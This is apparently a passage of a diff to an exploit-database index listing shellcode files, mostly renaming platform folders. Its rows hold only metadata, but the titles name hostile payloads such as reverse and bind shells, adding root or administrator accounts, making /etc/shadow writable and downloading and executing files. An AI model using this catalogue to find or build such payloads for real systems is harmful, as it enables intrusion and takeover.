bytes)",2010-09-05,"Jonathan Salwan",shellcode,arm -15063,shellcodes/win_x86/15063.c,"Windows XP SP3 x86 (Turkish) - Add Administrator User (zrl/123456) Shellcode (127 bytes)",2010-09-20,ZoRLu,shellcode,win_x86 +15063,shellcodes/windows_x86/15063.c,"Windows XP SP3 x86 (Turkish) - Add Administrator User (zrl/123456) Shellcode (127 bytes)",2010-09-20,ZoRLu,shellcode,windows_x86 15116,shellcodes/windows/15116.cpp,"Windows Mobile 6.5 TR (WinCE 5.2) - MessageBox Shellcode (ARM)",2010-09-26,"Celil Ünüver",shellcode,windows 15136,shellcodes/windows/15136.cpp,"Windows Mobile 6.5 TR - Phone Call Shellcode",2010-09-27,"Celil Ünüver",shellcode,windows -15202,shellcodes/win_x86/15202.c,"Windows XP Professional SP3 x86 (English) - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes)",2010-10-04,"Anastasios Monachos",shellcode,win_x86 -15203,shellcodes/win_x86/15203.c,"Windows x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes)",2010-10-04,"Anastasios Monachos",shellcode,win_x86 +15202,shellcodes/windows_x86/15202.c,"Windows XP Professional SP3 x86 (English) - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes)",2010-10-04,"Anastasios Monachos",shellcode,windows_x86 +15203,shellcodes/windows_x86/15203.c,"Windows x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes)",2010-10-04,"Anastasios Monachos",shellcode,windows_x86 15314,shellcodes/arm/15314.asm,"Linux/ARM - Bind TCP Shell (0x1337/TCP) Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm -15315,shellcodes/arm/15315.asm,"Linux/ARM - Bind TCP Listener (68/UDP) + Reverse TCP Shell (192.168.0.1:67/TCP) Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm +15315,shellcodes/arm/15315.asm,"Linux/ARM - Bind UDP Listener (68/UDP) + Reverse TCP Shell (192.168.0.1:67/TCP) Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm 15316,shellcodes/arm/15316.asm,"Linux/ARM - Bind TCP Listener (0x1337/TCP) + Receive Shellcode + Payload Loader Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm 15317,shellcodes/arm/15317.asm,"Linux/ARM - ifconfig eth0 192.168.0.2 up Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm 15616,shellcodes/arm/15616.c,"Linux/ARM - Add Root User (shell-storm/toor) Shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",shellcode,arm 15618,shellcodes/osx/15618.c,"OSX/Intel x86-64 - setuid shell Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",shellcode,osx 15712,shellcodes/generator/15712.rb,"ARM - Add Root User Shellcode (Metasploit) (66+ bytes) (Generator)",2010-12-09,"Jonathan Salwan",shellcode,generator -15879,shellcodes/win_x86/15879.txt,"Windows 5.0 < 7.0 x86 - Speaking 'You got pwned!' Null-Free Shellcode",2010-12-31,Skylined,shellcode,win_x86 +15879,shellcodes/windows_x86/15879.txt,"Windows 5.0 < 7.0 x86 - Speaking 'You got pwned!' Null-Free Shellcode",2010-12-31,Skylined,shellcode,windows_x86 16025,shellcodes/generator/16025.c,"FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:1337/TCP) Shellcode (81 bytes) (Generator)",2011-01-21,Tosh,shellcode,generator 16026,shellcodes/freebsd_x86/16026.c,"FreeBSD/x86 - Bind TCP /bin/sh Shell (31337/TCP) + Fork Shellcode (111 bytes)",2011-01-21,Tosh,shellcode,freebsd_x86 -16283,shellcodes/win_x86/16283.txt,"Windows x86 - Eggsearch Shellcode (33 bytes)",2011-03-05,oxff,shellcode,win_x86 -17432,shellcodes/sh4/17432.c,"Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes)",2011-06-22,"Jonathan Salwan",shellcode,sh4 -17194,shellcodes/lin_x86/17194.txt,"Linux/x86 - Bind Netcat (/usr/bin/netcat) /bin/sh Shell (6666/TCP) + Polymorphic XOR Encoded Shellcode (69/93 bytes)",2011-04-21,"Jonathan Salwan",shellcode,lin_x86 +16283,shellcodes/windows_x86/16283.txt,"Windows x86 - Eggsearch Shellcode (33 bytes)",2011-03-05,oxff,shellcode,windows_x86 +17432,shellcodes/superh_sh4/17432.c,"Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes)",2011-06-22,"Jonathan Salwan",shellcode,superh_sh4 +17194,shellcodes/linux_x86/17194.txt,"Linux/x86 - Bind Netcat (/usr/bin/netcat) /bin/sh Shell (6666/TCP) + Polymorphic XOR Encoded Shellcode (69/93 bytes)",2011-04-21,"Jonathan Salwan",shellcode,linux_x86 17224,shellcodes/osx/17224.s,"OSX/Intel x86-64 - Reverse TCP /bin/sh Shell (FFFFFFFF:4444/TCP) Shellcode (131 bytes)",2011-04-29,hammackj,shellcode,osx 17323,shellcodes/windows/17323.c,"Windows - Add Local Administrator User (RubberDuck/mudbath) + ExitProcess WinExec Shellcode (279 bytes)",2011-05-25,RubberDuck,shellcode,windows -20195,shellcodes/lin_x86/20195.c,"Linux/x86 - Disable ASLR Security Shellcode (83 bytes)",2012-08-02,"Jean Pascal Pereira",shellcode,lin_x86 +20195,shellcodes/linux_x86/20195.c,"Linux/x86 - Disable ASLR Security Shellcode (83 bytes)",2012-08-02,"Jean Pascal Pereira",shellcode,linux_x86 17326,shellcodes/generator/17326.rb,"Windows - Download File + Execute via DNS (IPv6) Shellcode (Generator) (Metasploit)",2011-05-26,"Alexey Sintsov",shellcode,generator -17371,shellcodes/lin_x86/17371.txt,"Linux/x86 - Reverse TCP SSL Shell (localhost:8080/TCP) Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",shellcode,lin_x86 -17439,shellcodes/sh4/17439.c,"Linux/SuperH (sh4) - Add Root User (shell-storm/toor) Shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",shellcode,sh4 -17545,shellcodes/win_x86/17545.txt,"Windows PerfectXp-pc1/SP3 x86 (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,shellcode,win_x86 -17559,shellcodes/lin_x86/17559.c,"Linux/x86 - Egghunter Null-Free Shellcode (29 bytes)",2011-07-21,"Ali Raheem",shellcode,lin_x86 +17371,shellcodes/linux_x86/17371.txt,"Linux/x86 - Reverse TCP SSL Shell (localhost:8080/TCP) Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",shellcode,linux_x86 +17439,shellcodes/superh_sh4/17439.c,"Linux/SuperH (sh4) - Add Root User (shell-storm/toor) Shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",shellcode,superh_sh4 +17545,shellcodes/windows_x86/17545.txt,"Windows PerfectXp-pc1/SP3 x86 (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,shellcode,windows_x86 +17559,shellcodes/linux_x86/17559.c,"Linux/x86 - Egghunter Null-Free Shellcode (29 bytes)",2011-07-21,"Ali Raheem",shellcode,linux_x86 17564,shellcodes/osx/17564.asm,"OSX - Universal ROP + Reverse TCP Shell Shellcode",2011-07-24,pa_kt,shellcode,osx 17940,shellcodes/linux_mips/17940.c,"Linux/MIPS - execve /bin/sh Shellcode (52 bytes)",2011-10-07,entropy,shellcode,linux_mips 17996,shellcodes/generator/17996.c,"Linux/MIPS - XOR Encoder Shellcode (60 bytes) (Generator)",2011-10-18,entropy,shellcode,generator -18154,shellcodes/sh4/18154.c,"Linux/SuperH (sh4) - setuid(0); + execve(_/bin/sh__ NULL_ NULL) Shellcode (27 bytes)",2011-11-24,"Jonathan Salwan",shellcode,sh4 +18154,shellcodes/superh_sh4/18154.c,"Linux/SuperH (sh4) - setuid(0) + execve(_/bin/sh__ NULL_ NULL) Shellcode (27 bytes)",2011-11-24,"Jonathan Salwan",shellcode,superh_sh4 18162,shellcodes/linux_mips/18162.c,"Linux/MIPS - execve /bin/sh Shellcode (48 bytes)",2011-11-27,rigan,shellcode,linux_mips 18163,shellcodes/linux_mips/18163.c,"Linux/MIPS - Add Root User (rOOt/pwn3d) Shellcode (164 bytes)",2011-11-27,rigan,shellcode,linux_mips -18197,shellcodes/lin_x86-64/18197.c,"Linux/x86-64 - execve /bin/sh Shellcode (52 bytes)",2011-12-03,X-h4ck,shellcode,lin_x86-64 +18197,shellcodes/linux_x86-64/18197.c,"Linux/x86-64 - execve /bin/sh Shellcode (52 bytes)",2011-12-03,X-h4ck,shellcode,linux_x86-64 18226,shellcodes/linux_mips/18226.c,"Linux/MIPS - Reverse TCP Shell (0x7a69/TCP) Shellcode (168 bytes)",2011-12-10,rigan,shellcode,linux_mips 18227,shellcodes/linux_mips/18227.c,"Linux/MIPS - reboot() Shellcode (32 bytes)",2011-12-10,rigan,shellcode,linux_mips -18294,shellcodes/lin_x86/18294.c,"Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd Polymorphic Shellcode",2011-12-31,pentesters.ir,shellcode,lin_x86 -18379,shellcodes/lin_x86/18379.c,"Linux/x86 - Search For '.PHP'/'.HTML' Writable Files + Add Code Shellcode (380+ bytes)",2012-01-17,rigan,shellcode,lin_x86 -18585,shellcodes/lin_x86-64/18585.s,"Linux/x86-64 - Add Root User (t0r/Winner) Shellcode (189 bytes)",2012-03-12,0_o,shellcode,lin_x86-64 -18885,shellcodes/lin_x86/18885.c,"Linux/x86 - execve /bin/dash Shellcode (42 bytes)",2012-05-16,X-h4ck,shellcode,lin_x86 -20196,shellcodes/lin_x86/20196.c,"Linux/x86 - chmod 666 /etc/passwd + /etc/shadow Shellcode (57 bytes)",2012-08-02,"Jean Pascal Pereira",shellcode,lin_x86 +18294,shellcodes/linux_x86/18294.c,"Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd Polymorphic Shellcode",2011-12-31,pentesters.ir,shellcode,linux_x86 +18379,shellcodes/linux_x86/18379.c,"Linux/x86 - Search For '.PHP'/'.HTML' Writable Files + Add Code Shellcode (380+ bytes)",2012-01-17,rigan,shellcode,linux_x86 +18585,shellcodes/linux_x86-64/18585.s,"Linux/x86-64 - Add Root User (t0r/Winner) Shellcode (189 bytes)",2012-03-12,0_o,shellcode,linux_x86-64 +18885,shellcodes/linux_x86/18885.c,"Linux/x86 - execve /bin/dash Shellcode (42 bytes)",2012-05-16,X-h4ck,shellcode,linux_x86 +20196,shellcodes/linux_x86/20196.c,"Linux/x86 - chmod 666 /etc/passwd + /etc/shadow Shellcode (57 bytes)",2012-08-02,"Jean Pascal Pereira",shellcode,linux_x86 21252,shellcodes/arm/21252.asm,"Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (10.1.1.2:0x1337/TCP) Shellcode (72 bytes)",2012-09-11,midnitesnake,shellcode,arm 21253,shellcodes/arm/21253.asm,"Linux/ARM (Raspberry Pi) - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (30 bytes)",2012-09-11,midnitesnake,shellcode,arm 21254,shellcodes/arm/21254.asm,"Linux/ARM (Raspberry Pi) - chmod 0777 /etc/shadow Shellcode (41 bytes)",2012-09-11,midnitesnake,shellcode,arm -40363,shellcodes/win_x86/40363.c,"Windows x86 - Bind TCP Password (damn_it!$$##@;*#) Shell Shellcode (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",shellcode,win_x86 +40363,shellcodes/windows_x86/40363.c,"Windows x86 - Bind TCP Password (damn_it!$$##@;*#) Shell Shellcode (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",shellcode,windows_x86 22489,shellcodes/windows/22489.cpp,"Windows XP Professional SP3 - calc.exe (C:/WINDOWS/system32/calc.exe) ROP Shellcode (428 bytes)",2012-11-05,b33f,shellcode,windows -40890,shellcodes/win_x86-64/40890.c,"Windows x64 - Bind TCP Shell (4444/TCP) Shellcode (508 bytes)",2016-12-08,"Roziul Hasan Khan Shifat",shellcode,win_x86-64 -23622,shellcodes/lin_x86/23622.c,"Linux/x86 - Remote Port Forwarding (ssh -R 9999:localhost:22 192.168.0.226) Shellcode (87 bytes)",2012-12-24,"Hamza Megahed",shellcode,lin_x86 +40890,shellcodes/windows_x86-64/40890.c,"Windows x64 - Bind TCP Shell (4444/TCP) Shellcode (508 bytes)",2016-12-08,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 +23622,shellcodes/linux_x86/23622.c,"Linux/x86 - Remote Port Forwarding (ssh -R 9999:localhost:22 192.168.0.226) Shellcode (87 bytes)",2012-12-24,"Hamza Megahed",shellcode,linux_x86 24318,shellcodes/windows/24318.c,"Windows (2000/XP/7 x64/x86) - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec + ExitProcess Shellcode",2013-01-24,RubberDuck,shellcode,windows -25497,shellcodes/lin_x86/25497.c,"Linux/x86 - Reverse TCP Shell (192.168.1.10:31337/TCP) Shellcode (92 bytes)",2013-05-17,"Russell Willis",shellcode,lin_x86 +25497,shellcodes/linux_x86/25497.c,"Linux/x86 - Reverse TCP Shell (192.168.1.10:31337/TCP) Shellcode (92 bytes)",2013-05-17,"Russell Willis",shellcode,linux_x86 40387,shellcodes/hardware/40387.nasm,"Cisco ASA - Authentication Bypass _EXTRABACON_ (Improved Shellcode) (69 bytes)",2016-09-16,"Sean Dillon",shellcode,hardware -27132,shellcodes/hardware/27132.txt,"MIPS (Little Endian) - system() Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",shellcode,hardware +27132,shellcodes/linux_mips/27132.txt,"Linux/MIPS (Little Endian) - system() Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",shellcode,linux_mips 27180,shellcodes/arm/27180.asm,"Windows RT ARM - Bind TCP Shell (4444/TCP) Shellcode",2013-07-28,"Matthew Graeber",shellcode,arm -40827,shellcodes/lin_x86/40827.c,"Linux/x86 - Egghunter Shellcode (31 bytes)",2016-11-25,"Filippo Bersani",shellcode,lin_x86 -28474,shellcodes/lin_x86/28474.c,"Linux/x86 - Egg Omelet (Multi-Egghunter) + Reverse TCP /bin/sh Shell (192.168.122.1:43981/TCP) Shellcode",2013-09-23,"Ryan Fenno",shellcode,lin_x86 -40334,shellcodes/win_x86/40334.c,"Windows x86 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Persistent Access Shellcode (494 bytes)",2016-09-05,"Roziul Hasan Khan Shifat",shellcode,win_x86 +40827,shellcodes/linux_x86/40827.c,"Linux/x86 - Egghunter Shellcode (31 bytes)",2016-11-25,"Filippo Bersani",shellcode,linux_x86 +28474,shellcodes/linux_x86/28474.c,"Linux/x86 - Egg Omelet (Multi-Egghunter) + Reverse TCP /bin/sh Shell (192.168.122.1:43981/TCP) Shellcode",2013-09-23,"Ryan Fenno",shellcode,linux_x86 +40334,shellcodes/windows_x86/40334.c,"Windows x86 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Persistent Access Shellcode (494 bytes)",2016-09-05,"Roziul Hasan Khan Shifat",shellcode,windows_x86 28996,shellcodes/windows/28996.c,"Windows - MessageBox Null-Free Shellcode (113 bytes)",2013-10-16,"Giuseppe D'Amore",shellcode,windows 29436,shellcodes/linux_mips/29436.asm,"Linux/MIPS (Little Endian) - Reverse TCP /bin/sh Shell (192.168.1.177:31337/TCP) Shellcode (200 bytes)",2013-11-04,"Jacob Holcomb",shellcode,linux_mips -40352,shellcodes/win_x86/40352.c,"Windows 7 x86 - Bind TCP Shell (4444/TCP) Shellcode (357 bytes)",2016-09-08,"Roziul Hasan Khan Shifat",shellcode,win_x86 +40352,shellcodes/windows_x86/40352.c,"Windows 7 x86 - Bind TCP Shell (4444/TCP) Shellcode (357 bytes)",2016-09-08,"Roziul Hasan Khan Shifat",shellcode,windows_x86 33836,shellcodes/windows/33836.txt,"Windows - Add Administrator User (BroK3n/BroK3n) Null-Free Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",shellcode,windows -34060,shellcodes/lin_x86/34060.c,"Linux/x86 - execve /bin/sh + Socket Re-Use Shellcode (50 bytes)",2014-07-14,ZadYree,shellcode,lin_x86 -34262,shellcodes/lin_x86/34262.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + Execute /bin/sh Shellcode (378 bytes)",2014-08-04,"Ali Razmjoo",shellcode,lin_x86 -34592,shellcodes/lin_x86/34592.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)",2014-09-09,"Ali Razmjoo",shellcode,lin_x86 -34667,shellcodes/lin_x86-64/34667.c,"Linux/x86-64 - Reverse TCP /bin/bash Shell (127.1.1.1:6969/TCP) Shellcode (139 bytes)",2014-09-15,MadMouse,shellcode,lin_x86-64 -34778,shellcodes/lin_x86/34778.c,"Linux/x86 - Add Map (google.com 127.1.1.1) In /etc/hosts Shellcode (77 bytes)",2014-09-25,"Javier Tejedor",shellcode,lin_x86 -35205,shellcodes/lin_x86-64/35205.txt,"Linux/x86-64 - execve(_/bin/sh\0__NULL_NULL); Position Independent Alphanumeric Shellcode (87 bytes)",2014-11-10,Breaking.Technology,shellcode,lin_x86-64 -35519,shellcodes/lin_x86/35519.txt,"Linux/x86 - rmdir Shellcode (37 bytes)",2014-12-11,kw4,shellcode,lin_x86 -35586,shellcodes/lin_x86-64/35586.c,"Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) + Password (Z~r0) Null-Free Shellcode (81/96 bytes)",2014-12-22,"Sean Dillon",shellcode,lin_x86-64 -35587,shellcodes/lin_x86-64/35587.c,"Linux/x86-64 - Reverse TCP Password (Z~r0) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)",2014-12-22,"Sean Dillon",shellcode,lin_x86-64 -35793,shellcodes/win_x86/35793.txt,"Windows x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,win_x86 -35794,shellcodes/win_x86-64/35794.txt,"Windows x64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,win_x86-64 +34060,shellcodes/linux_x86/34060.c,"Linux/x86 - execve /bin/sh + Socket Re-Use Shellcode (50 bytes)",2014-07-14,ZadYree,shellcode,linux_x86 +34262,shellcodes/linux_x86/34262.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + Execute /bin/sh Shellcode (378 bytes)",2014-08-04,"Ali Razmjoo",shellcode,linux_x86 +34592,shellcodes/linux_x86/34592.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)",2014-09-09,"Ali Razmjoo",shellcode,linux_x86 +34667,shellcodes/linux_x86-64/34667.c,"Linux/x86-64 - Reverse TCP /bin/bash Shell (127.1.1.1:6969/TCP) Shellcode (139 bytes)",2014-09-15,MadMouse,shellcode,linux_x86-64 +34778,shellcodes/linux_x86/34778.c,"Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Shellcode (77 bytes)",2014-09-25,"Javier Tejedor",shellcode,linux_x86 +35205,shellcodes/linux_x86-64/35205.txt,"Linux/x86-64 - execve(_/bin/sh\0__NULL_NULL) Position Independent Alphanumeric Shellcode (87 bytes)",2014-11-10,Breaking.Technology,shellcode,linux_x86-64 +35519,shellcodes/linux_x86/35519.txt,"Linux/x86 - rmdir Shellcode (37 bytes)",2014-12-11,kw4,shellcode,linux_x86 +35586,shellcodes/linux_x86-64/35586.c,"Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) + Password (Z~r0) Null-Free Shellcode (81/96 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64 +35587,shellcodes/linux_x86-64/35587.c,"Linux/x86-64 - Reverse TCP Password (Z~r0) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64 +35793,shellcodes/windows_x86/35793.txt,"Windows x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,windows_x86 +35794,shellcodes/windows_x86-64/35794.txt,"Windows x64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,windows_x86-64 35868,shellcodes/linux_mips/35868.c,"Linux/MIPS - execve /bin/sh Shellcode (36 bytes)",2015-01-22,Sanguine,shellcode,linux_mips 36411,shellcodes/generator/36411.txt,"Windows XP x86-64 - Download File + Execute Shellcode (Generator)",2015-03-16,"Ali Razmjoo",shellcode,generator 36274,shellcodes/linux_mips/36274.c,"Linux/MIPS (Little Endian) - chmod 666 /etc/shadow Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",shellcode,linux_mips 36276,shellcodes/linux_mips/36276.c,"Linux/MIPS (Little Endian) - chmod 666 /etc/passwd Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",shellcode,linux_mips -36359,shellcodes/lin_x86-64/36359.c,"Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (118 bytes)",2014-03-27,"Chris Higgins",shellcode,lin_x86-64 -36391,shellcodes/lin_x86/36391.c,"Linux/x86 - execve /bin/sh ROT13 Encoded Shellcode (68 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,lin_x86 -36393,shellcodes/lin_x86/36393.c,"Linux/x86 - chmod 0777 /etc/shadow Obfuscated Shellcode (84 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,lin_x86 -36394,shellcodes/lin_x86/36394.c,"Linux/x86 - Add Map (google.com 127.1.1.1) In /etc/hosts Obfuscated Shellcode (98 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,lin_x86 -36395,shellcodes/lin_x86/36395.c,"Linux/x86 - execve /bin/sh Obfuscated Shellcode (40 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,lin_x86 -36397,shellcodes/lin_x86/36397.c,"Linux/x86 - Reverse TCP /bin/sh Shell (192.168.1.133:33333/TCP) Shellcode (72 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,lin_x86 -36398,shellcodes/lin_x86/36398.c,"Linux/x86 - Bind TCP /bin/sh Shell (33333/TCP) Shellcode (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,lin_x86 -36637,shellcodes/lin_x86/36637.c,"Linux/x86 - Disable ASLR Security Shellcode (84 bytes)",2015-04-03,"Mohammad Reza Ramezani",shellcode,lin_x86 -36672,shellcodes/lin_x86/36672.asm,"Linux/x86 - Egghunter Shellcode (20 bytes)",2015-04-08,"Paw Petersen",shellcode,lin_x86 +36359,shellcodes/linux_x86-64/36359.c,"Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (118 bytes)",2014-03-27,"Chris Higgins",shellcode,linux_x86-64 +36391,shellcodes/linux_x86/36391.c,"Linux/x86 - execve /bin/sh ROT13 Encoded Shellcode (68 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86 +36393,shellcodes/linux_x86/36393.c,"Linux/x86 - chmod 0777 /etc/shadow Obfuscated Shellcode (84 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86 +36394,shellcodes/linux_x86/36394.c,"Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Obfuscated Shellcode (98 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86 +36395,shellcodes/linux_x86/36395.c,"Linux/x86 - execve /bin/sh Obfuscated Shellcode (40 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86 +36397,shellcodes/linux_x86/36397.c,"Linux/x86 - Reverse TCP /bin/sh Shell (192.168.1.133:33333/TCP) Shellcode (72 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86 +36398,shellcodes/linux_x86/36398.c,"Linux/x86 - Bind TCP /bin/sh Shell (33333/TCP) Shellcode (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86 +36637,shellcodes/linux_x86/36637.c,"Linux/x86 - Disable ASLR Security Shellcode (84 bytes)",2015-04-03,"Mohammad Reza Ramezani",shellcode,linux_x86 +36672,shellcodes/linux_x86/36672.asm,"Linux/x86 - Egghunter Shellcode (20 bytes)",2015-04-08,"Paw Petersen",shellcode,linux_x86 36673,shellcodes/generator/36673.py,"Linux/x86 - Typewriter Shellcode (Generator)",2015-04-08,"Paw Petersen",shellcode,generator -36701,shellcodes/lin_x86/36701.c,"Linux/x86 - Create _my.txt_ In Working Directory Shellcode (37 bytes)",2015-04-10,"Mohammad Reza Ramezani",shellcode,lin_x86 -36750,shellcodes/lin_x86/36750.c,"Linux/x86 - setreuid(0_ 0) + execve(_/sbin/halt_) + exit(0) Shellcode (49 bytes)",2015-04-14,"Febriyanto Nugroho",shellcode,lin_x86 -36778,shellcodes/lin_x86/36778.c,"Linux/x86 - execve /bin/sh Shellcode (35 bytes)",2015-04-17,"Mohammad Reza Espargham",shellcode,lin_x86 -36779,shellcodes/win_x86/36779.c,"Windows XP SP3 x86 - Create (_file.txt_) Shellcode (83 bytes)",2015-04-17,"TUNISIAN CYBER",shellcode,win_x86 -36780,shellcodes/win_x86/36780.c,"Windows XP SP3 x86 - Restart Shellcode (57 bytes)",2015-04-17,"TUNISIAN CYBER",shellcode,win_x86 +36701,shellcodes/linux_x86/36701.c,"Linux/x86 - Create _my.txt_ In Working Directory Shellcode (37 bytes)",2015-04-10,"Mohammad Reza Ramezani",shellcode,linux_x86 +36750,shellcodes/linux_x86/36750.c,"Linux/x86 - setreuid(0_ 0) + execve(_/sbin/halt_) + exit(0) Shellcode (49 bytes)",2015-04-14,"Febriyanto Nugroho",shellcode,linux_x86 +36778,shellcodes/linux_x86/36778.c,"Linux/x86 - execve /bin/sh Shellcode (35 bytes)",2015-04-17,"Mohammad Reza Espargham",shellcode,linux_x86 +36779,shellcodes/windows_x86/36779.c,"Windows XP SP3 x86 - Create (_file.txt_) Shellcode (83 bytes)",2015-04-17,"TUNISIAN CYBER",shellcode,windows_x86 +36780,shellcodes/windows_x86/36780.c,"Windows XP SP3 x86 - Restart Shellcode (57 bytes)",2015-04-17,"TUNISIAN CYBER",shellcode,windows_x86 36781,shellcodes/generator/36781.py,"Linux/x86 - Custom execve Shellcode (Encoder/Decoder) (Generator)",2015-04-17,"Konstantinos Alexiou",shellcode,generator -36857,shellcodes/lin_x86/36857.c,"Linux/x86 - execve /bin/sh (Push Method) Shellcode (21 bytes)",2015-04-29,noviceflux,shellcode,lin_x86 -36858,shellcodes/lin_x86-64/36858.c,"Linux/x86-64 - execve /bin/sh Via Push Shellcode (23 bytes)",2015-04-29,noviceflux,shellcode,lin_x86-64 -36921,shellcodes/lin_x86/36921.c,"Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (17771/TCP) Shellcode (58 bytes)",2015-05-06,"Oleg Boytsev",shellcode,lin_x86 -36908,shellcodes/lin_x86/36908.c,"Linux/x86 - exit(0) Shellcode (6 bytes)",2015-05-04,"Febriyanto Nugroho",shellcode,lin_x86 -37069,shellcodes/lin_x86/37069.c,"Linux/x86 - execve /bin/sh Shellcode (26 bytes)",2015-05-20,"Reza Behzadpour",shellcode,lin_x86 -37251,shellcodes/lin_x86/37251.asm,"Linux/x86 - execve /bin/sh Shellcode (21 bytes) (1)",2015-06-10,B3mB4m,shellcode,lin_x86 -37285,shellcodes/lin_x86/37285.txt,"Linux/x86 - chmod 777 /etc/shadow + exit() Shellcode (33 bytes)",2015-06-15,B3mB4m,shellcode,lin_x86 -37289,shellcodes/lin_x86/37289.txt,"Linux/x86 - Shutdown(init 0) Shellcode (30 bytes)",2015-06-15,B3mB4m,shellcode,lin_x86 -37297,shellcodes/lin_x86/37297.txt,"Linux/x86 - Read /etc/passwd Shellcode (58 bytes)",2015-06-16,B3mB4m,shellcode,lin_x86 -37358,shellcodes/lin_x86/37358.c,"Linux/x86 - mkdir HACK + chmod 777 + exit(0) Shellcode (29 bytes)",2015-06-24,B3mB4m,shellcode,lin_x86 -37359,shellcodes/lin_x86/37359.c,"Linux/x86 - Bind Netcat Shell (5555/TCP) Shellcode (60 bytes)",2015-06-24,B3mB4m,shellcode,lin_x86 -37362,shellcodes/lin_x86-64/37362.c,"Linux/x86-64 - execve /bin/sh Null-Free Shellcode (30 bytes)",2015-06-24,"Bill Borskey",shellcode,lin_x86-64 -37365,shellcodes/lin_x86/37365.c,"Linux/x86 - Download File + Execute Shellcode",2015-06-24,B3mB4m,shellcode,lin_x86 -37366,shellcodes/lin_x86/37366.c,"Linux/x86 - Reboot Shellcode (28 bytes)",2015-06-24,B3mB4m,shellcode,lin_x86 -37384,shellcodes/lin_x86/37384.c,"Linux/x86 - execve /bin/sh Shellcode (23 bytes)",2015-06-26,"Bill Borskey",shellcode,lin_x86 -37390,shellcodes/lin_x86/37390.asm,"Linux/x86 - chmod 0777 /etc/passwd Shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,lin_x86 -37391,shellcodes/lin_x86/37391.asm,"Linux/x86 - chmod /etc/gshadow Shellcode 